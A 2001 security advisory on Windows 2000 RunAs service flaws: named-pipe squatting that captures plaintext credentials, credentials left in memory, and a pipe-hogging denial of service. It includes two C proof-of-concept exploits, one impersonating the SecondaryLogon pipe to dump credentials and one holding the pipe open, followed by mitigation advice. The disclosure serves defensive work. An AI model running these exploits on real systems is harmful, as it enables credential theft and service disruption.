COMMAND RunAs SYSTEMS AFFECTED Windows 2000 (SP1/SP2) Windows 2000 TSE (SP1/SP2) PROBLEM Camisade - Team RADIX (research@camisade.com) [http://www.camisade.com] with SecurityFocus.com Vulnerability Help Team, posted : The Windows 2000 RunAs service allows a user to launch an application in a security context based upon a supplied set of credentials. If the service is ever in a stopped state, an arbitrary local user of the system has the ability to recover the RunAs service user\'s plaintext credentials. Additionally, the user may also impersonate the credentials the clients of the RunAs service. The utility also suffers from the fact that the buffer is never erased after the application terminates execution. Finally, the RunAs service suffers from being non-reentrant, which could lead to a DoS on that service. Details follows : -- First bug -- The Windows 2000 API CreateProcessWithLogonW leverages the RunAs service to authenticate and launch an application requested by the user, in a distinct security context, based on the credentials supplied. Consequently, that API must send highly sensitive data to the RunAs service in order to launch that application. However, that API performs no server-side authenticity validation prior to sending the credentials. If the RunAs service is ever in a stopped state, an arbitrary user may usurp its named pipe communication channel \"\\\\.\\pipe\\secondarylogon\". The user\'s malicious application would then be capable of stealing credentials of the users of the RunAs service, because the credentials are sent in plaintext. Additionally, the application is capable of impersonating the clients\' security context throughout the system in an effort to escalate privileges. In light of issues such as these, Microsoft created the native API NtSecureConnectPort for sending highly sensitive data via the LPC subsystem. Unfortunately, there is no standard API, provided by Microsoft, for deterministically connecting to a pipe based on a supplied SID. Exploit : // radix1112200101.c - Camisade - Team RADIX - 11-12-2001 // // Camisade (www.camisade.com) is not responsible for the use or // misuse of this proof of concept source code. #define WIN32_LEAN_AND_MEAN #define UNICODE #define _UNICODE #include <windows.h> #include <tchar.h> #include <stdio.h> #define MAX_IN_BUF 0x1000 #define MAX_OUT_BUF 0x4 #define MAX_INST 0xA #define SECONDARY_LOGON_PIPE _T(\"\\\\\\\\.\\\\pipe\\\\SecondaryLogon\") void main() { HANDLE hPipe; hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF, NMPWAIT_USE_DEFAULT_WAIT, 0); if (hPipe == INVALID_HANDLE_VALUE) { printf(\"Can\'t create secondary logon pipe. Error %d\\n\", GetLastError()); return; } printf(\"Created pipe and waiting for clients...\\n\"); if (ConnectNamedPipe(hPipe, 0)) { UCHAR InBuf[MAX_IN_BUF]; DWORD dwReadCount; while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0)) { printf(\"Read %d bytes. (ASCII Dump)\\n\", dwReadCount); DWORD dwPos; for (dwPos = 0; dwPos < dwReadCount; dwPos++) { printf(\"%c \", InBuf[dwPos]); if ((dwPos % 16) == 0) printf(\"\\n\"); } DWORD dwReply = ERROR_ACCESS_DENIED; DWORD dwWroteCount; WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0); } } DisconnectNamedPipe(hPipe); CloseHandle(hPipe); } -- Second bug -- Applications that deal with highly sensitive data, such as user credentials, must ensure that those credentials are sufficiently destroyed after their use. The RunAs utility performs no such destruction with credentials supplied by the user. They are left, in plaintext, on the application\'s stack when the application has terminated. Those credentials will be present when an arbitrary application or driver has reallocated that particular allocation page. A malicious application could wait for a RunAs session to terminate then subsequently search for that user\'s credentials. In order to execute this vulnerability, the malicious user must have interactive access to the Windows 2000 machine. Because of this, Windows 2000 Terminal services would be most applicable for an attack. -- Third bug -- Architecturally, all communication with the RunAs service is done by means of the named pipe \"\\\\.\\pipe\\secondarylogon\". Additionally, the Windows 2000 API CreateProcessWithLogonW leverages this communications channel in an effort to launch a process with a supplied set of credentials. The RunAs service was implemented to provide service exclusively to one client per request. If more than one client requests service, from the RunAs service, simultaneously, the clients will receive the error \"231: All pipe instances are busy\". Consequently, it is possible for one client to simply connect to the pipe and never request any service. The RunAs service will wait for the client to either disconnect or send data and will not process any other requests until that happens. It is possible for the attack to occur remotely, however, because of the DACL associated with the pipe, the only users capable of this would be members of the Administrators group. Because of the aforementioned information, the most applicable context in which this vulnerability could be leveraged would be that of Windows 2000 Terminal services. Exploit : // radix1112200103.c - Camisade - Team RADIX - 11-12-2001 // // Camisade (www.camisade.com) is not responsible for the use or // misuse of this proof of concept source code. #define WIN32_LEAN_AND_MEAN #define UNICODE #define _UNICODE #include <windows.h> #include <tchar.h> #include <stdio.h> #include <conio.h> #define SECLOGON_PIPE _T(\"\\\\\\\\.\\\\pipe\\\\secondarylogon\") void main() { HANDLE hPipe; hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0); if (hPipe == INVALID_HANDLE_VALUE) { printf(\"Unable to open pipe, error %d\\n\", GetLastError()); return; } printf(\"Connected to pipe. Press any key to disconnect.\\n\"); getche(); CloseHandle(hPipe); } SOLUTION In the meantime, do not use the RunAs service. However, do not disable the RunAs service. This vulnerability can only be exploited if the RunAs service is not running. The malicious attacker is performing a man in the middle attack using a malicious RunAs service. Summary: Ensure the RunAs service is in it\'s default setting (automatically started and running). The default install of the service, unused and not set to manual (or disabled) is the safest method until service pack 3 is released. As a temporary solution, do not use any utilities that leverage the RunAs service. This includes the RunAs command line utility and Explorer\'s RunAs functionality.